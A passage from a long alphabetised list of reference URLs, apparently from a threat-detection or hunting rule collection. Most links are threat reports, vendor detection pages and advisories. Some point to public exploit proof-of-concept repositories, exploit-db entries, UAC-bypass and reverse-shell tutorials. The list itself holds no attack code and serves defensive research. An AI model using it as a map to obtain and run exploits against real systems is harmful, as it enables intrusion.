n-exploit/\nhttps://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu\nhttps://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1\nhttps://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\nhttps://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare\nhttps://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934\nhttps://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html\nhttps://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf\nhttps://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe\nhttps://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html\nhttps://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver\nhttps://web.archive.org/web/20220422215221/https://twitter.com/malware_traffic/status/1517622327000846338\nhttps://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive\nhttps://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/\nhttps://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/\nhttps://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html\nhttps://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html\nhttps://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/\nhttps://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/\nhttps://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008\nhttps://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\nhttps://web.archive.org/web/20230217071802/https://blooteem.com/march-2022\nhttps://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html\nhttps://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html\nhttps://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html\nhttps://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nhttps://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html\nhttps://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html\nhttps://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nhttps://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nhttps://web.archive.org/web/20231210115125/http://www.xuetr.com/\nhttps://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/\nhttps://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://wikileaks.org/vault7/#Pandemic\nhttps://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/\nhttps://winaero.com/enable-openssh-server-windows-10/\nhttps://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/\nhttps://windows-internals.com/faxing-your-way-to-system/\nhttps://windows-internals.com/printdemon-cve-2020-1048/\nhttps://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\nhttps://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\nhttps://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp\nhttps://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nhttps://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\nhttps://www.acronis.com/en-us/blog/posts/lockbit-ransomware/\nhttps://www.action1.com/documentation/\nhttps://www.activecyber.us/activelabs/windows-uac-bypass\nhttps://www.acunetix.com/blog/articles/exploiting-sql-injection-example/\nhttps://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/\nhttps://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/\nhttps://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\nhttps://www.advanced-ip-scanner.com/\nhttps://www.advanced-port-scanner.com/\nhttps://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent\nhttps://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl\nhttps://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats\nhttps://www.ammyy.com/en/admin_features.html\nhttps://www.ampliasecurity.com/research/windows-credentials-editor/\nhttps://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations\nhttps://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies\nhttps://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat\nhttps://www.anquanke.com/post/id/226029\nhttps://www.anyviewer.com/help/remote-technical-support.html\nhttps://www.arxiv-vanity.com/papers/2008.04676/\nhttps://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\nhttps://www.atomicredteam.io/atomic-red-team/atomics/T1048.003#atomic-test-8---python3-httpserver\nhttps://www.atomicredteam.io/atomic-red-team/atomics/T156001#atomic-test-46---aws---guardduty-suspension-or-deletion\nhttps://www.atomicredteam.io/atomic-red-team/atomics/T1562.002#atomic-test-8---modify-event-log-channel-access-permissions-via-registry---powershell\nhttps://www.atomicredteam.io/atomic-red-team/atomics/T1562.012\nhttps://www.autohotkey.com/download/\nhttps://www.autoitscript.com/site/\nhttps://www.beyondtrust.com/blog/entry/okta-support-unit-breach\nhttps://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon\nhttps://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/\nhttps://www.bitdefender.com/en-us/blog/businessinsights/bitdefender-advisory-critical-unauthenticated-rce-windows-server-update-services-cve-2025-59287\nhttps://www.bitdefender.com/en-us/blog/businessinsights/shrinklocker-decryptor-from-friend-to-foe-and-back-again\nhttps://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf\nhttps://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf\nhttps://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf\nhttps://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nhttps://www.blackhillsinfosec.com/mitm6-strikes-again-the-dark-side-of-ipv6/\nhttps://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/\nhttps://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\nhttps://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/\nhttps://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/\nhttps://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/\nhttps://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/\nhttps://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/\nhttps://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/\nhttps://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/\nhttps://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\nhttps://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/\nhttps://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/\nhttps://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/\nhttps://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/\nhttps://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/\nhttps://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/\nhttps://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/\nhttps://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\nhttps://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/\nhttps://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly\nhttps://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\nhttps://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/\nhttps://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html\nhttps://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nhttps://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents\nhttps://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html\nhttps://www.blumira.com/cve-2023-2283/\nhttps://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence\nhttps://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/\nhttps://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/\nhttps://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/\nhttps://www.chrisfarris.com/post/effective-aws-ransomware/\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\nhttps://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf\nhttps://www.cisa.gov/uscert/ncas/alerts/aa20-259a\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-321a\nhttps://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf\nhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html\nhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html\nhttps://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609\nhttps://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html\nhttps://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html\nhttps://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm\nhttps://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf\nhttps://www.cisecurity.org/controls/cis-controls-list/\nhttps://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf\nhttps://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf\nhttps://www.cloud-architekt.net/auditing-of-msi-and-service-principals/\nhttps://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/\nhttps://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet\nhttps://www.cobaltstrike.com/help-opsec\nhttps://www.cobaltstrike.com/help-windows-executable\nhttps://www.computerhope.com/unix/unohup.htm\nhttps://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/\nhttps://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\nhttps://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/\nhttps://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/\nhttps://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/\nhttps://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/\nhttps://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\nhttps://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/\nhttps://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/\nhttps://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/\nhttps://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\nhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/\nhttps://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\nhttps://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\nhttps://www.crowdstrike.com/blog/windows-restart-manager-part-1/\nhttps://www.crowdstrike.com/blog/windows-restart-manager-part-2/\nhttps://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/\nhttps://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update\nhttps://www.cve.org/CVERecord?id=CVE-2024-1708\nhttps://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/\nhttps://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\nhttps://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\nhttps://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles\nhttps://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms\nhttps://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\nhttps://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\nhttps://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/\nhttps://www.d7xtech.com/free-software/runx/\nhttps://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon\nhttps://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues\nhttps://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\nhttps://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation\nhttps://www.dfirnotes.net/portproxy_detection/\nhttps://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\nhttps://www.echotrail.io/insights/search/defaultpack.exe\nhttps://www.echotrail.io/insights/search/ilasm.exe\nhttps://www.echotrail.io/insights/search/msbuild.exe\nhttps://www.echotrail.io/insights/search/mshta.exe\nhttps://www.echotrail.io/insights/search/regsvr32.exe\nhttps://www.echotrail.io/insights/search/wermgr.exe\nhttps://www.echotrail.io/insights/search/wusa.exe/\nhttps://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nhttps://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign\nhttps://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation\nhttps://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html\nhttps://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html\nhttps://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html\nhttps://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html\nhttps://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275\nhttps://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html\nhttps://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html\nhttps://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html\nhttps://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nhttps://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html\nhttps://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html\nhttps://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script\nhttps://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html\nhttps://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html\nhttps://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html\nhttps://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html\nhttps://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html\nhttps://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html\nhttps://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html\nhttps://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack\nhttps://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html\nhttps://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html\nhttps://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html\nhttps://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html\nhttps://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html\nhttps://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html\nhttps://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html\nhttps://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html\nhttps://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\nhttps://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set\nhttps://www.elastic.co/security-labs/grimresource\nhttps://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion\nhttps://www.elastic.co/security-labs/operation-bleeding-bear\nhttps://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks\nhttps://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2\nhttps://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua\nhttps://www.epicturla.com/blog/sysinturla\nhttps://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html\nhttps://www.exploit-db.com/exploits/19525\nhttps://www.exploit-db.com/exploits/37525\nhttps://www.exploit-db.com/exploits/39161\nhttps://www.exploit-db.com/exploits/47297\nhttps://www.exploit-db.com/exploits/47696\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html\nhttps://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html\nhttps://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html\nhttps://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\nhttps://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html\nhttps://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html\nhttps://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html\nhttps://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\nhttps://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\nhttps://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html\nhttps://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\nhttps://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nhttps://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html\nhttps://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html\nhttps://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html\nhttps://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf\nhttps://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf\nhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf\nhttps://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf\nhttps://www.forensafe.com/blogs/runmrukey.html\nhttps://www.fortiguard.com/threat-signal-report/4718?s=09\nhttps://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign\nhttps://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\nhttps://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing\nhttps://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\nhttps://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf\nhttps://www.fortypoundhead.com/showcontent.asp?artid=24022\nhttps://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/\nhttps://www.giac.org/paper/gcih/266/review-ftp-protocol-cyber-defense-initiative/102802\nhttps://www.glitch-cat.com/p/green-lambert-and-attack\nhttps://www.gnu.org/software/wget/manual/wget.html\nhttps://www.google.com/search?q=%22reg.exe+save%22+sam\nhttps://www.google.com/search?q=procdump+lsass\nhttps://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw\nhttps://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nhttps://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d\nhttps://www.gpg4win.de/documentation.html\nhttps://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/\nhttps://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/\nhttps://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html\nhttps://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\nhttps://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/\nhttps://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics\nhttps://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/\nhttps://www.hackingarticles.in/rdp-session-hijacking-with-tscon/\nhttps://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/\nhttps://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/\nhttps://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf\nhttps://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/\nhttps://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\nhttps://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\nhttps://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nhttps://www.huntress.com/blog/attacking-mssql-servers\nhttps://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\nhttps://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\nhttps://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nhttps://www.huntress.com/blog/the-unwanted-guest\nhttps://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild\nhttps://www.hvs-consulting.de/lazarus-report/\nhttps://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100\nhttps://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100\nhttps://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100\nhttps://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100\nhttps://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100\nhttps://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100\nhttps://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1\nhttps://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100\nhttps://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100\nhttps://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100\nhttps://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100\nhttps://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120\nhttps://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100\nhttps://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100\nhttps://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100\nhttps://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\nhttps://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100\nhttps://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100\nhttps://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100\nhttps://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110\nhttps://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1\nhttps://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns\nhttps://www.ietf.org/rfc/rfc2821.txt\nhttps://www.infosecademy.com/netcat-reverse-shells/\nhttps://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz\nhttps://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject\nhttps://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/\nhttps://www.intrinsec.com/akira_ransomware/\nhttps://www.i